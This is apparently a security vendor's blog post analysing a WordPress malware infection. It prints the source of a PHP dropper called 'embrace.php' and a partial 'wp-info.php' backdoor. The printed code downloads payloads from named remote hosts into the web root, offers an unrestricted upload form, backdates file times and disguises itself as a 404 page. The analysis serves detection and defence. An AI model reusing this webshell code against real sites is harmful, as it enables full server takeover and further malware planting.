Top

wp-info.php

In WordPress themes there are lots of file upload vulnerabilities.

This trying upload embrace.php file to server and execute it

embrace.php

error_reporting(-1);
function fetch_url($url) {
    $contents = false;
    $errs = 0;
    while ( !$contents && ($errs++ < 3) )
    {
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1';
        if (extension_loaded('curl') && function_exists('curl_init')) {
            $c = curl_init($url);
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
            $contents = curl_exec($c);
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else
        {
            $options  = array('http' => array('user_agent' => $user_agent));
            $context  = stream_context_create($options);
            $contents = @file_get_contents($url, false, $context);                
        }
    }
    return $contents;
}
$test=$_SERVER['DOCUMENT_ROOT'];
if(isset($_REQUEST['doit'])){
if (file_exists("$test/wp-info.php")){
echo "Teddy already in place";
}
else{
$link = fetch_url("http://www.wayiview.com/license.txt");
file_put_contents("$test/wp-info.php", $link);
echo "Teddy-done";
}
}
elseif(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
    $filedir = ""; 
    $maxfile = '2888888';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);
  
echo"<center><b>Done ==> <a href='./$userfile_name'>$userfile_name</a></b></center>";
}
}
else{
echo '<b>'.php_uname().'</b>';
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
}
elseif(isset($_REQUEST['f3'])){
$dom = array_rand(array_flip(array("ml", "cf", "ga", "gq", "cu.cc")), 1);
$shname3 = uniqid();
$f3 = fetch_url("http://comxvas.$dom/3.txt");
$shnam3 = ("./$shname3.php");
file_put_contents($shnam3, $f3);
echo"<center><b>Done ==> <a href='./".$shname3.".php'>".$shname3.".php</a></b></center>";
touch("./$shname3.php", time() - mt_rand(60*60*24*30, 60*60*24*365));
}
else {
echo "Teddy-is-here";
}

wp-info.php

This malware can infect more and more malwares to server and get full control it.

function fetch_url($url) {
    $contents = false;
    $errs = 0;
    while ( !$contents && ($errs++ < 3) )
    {
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1 googlebot';
        if (extension_loaded('curl') && function_exists('curl_init')) {
            $c = curl_init($url);
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
            $contents = curl_exec($c);
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else
        {
            $options  = array('http' => array('user_agent' => $user_agent));
            $context  = stream_context_create($options);
            $contents = @file_get_contents($url, false, $context);                
        }
    }
    return $contents;
}
if(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
.
.
.
}
else{
echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>

<h1>Not Found (404)</h1>

The requested URL ";
echo $_SERVER['REQUEST_URI'];
echo "
was not found on this server.
<hr>

";
echo $_SERVER['SERVER_NAME'];
}

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this attack.

Use Malware Expert – Signatures detect this malware from files for FREE!

, , ,

Comments are closed.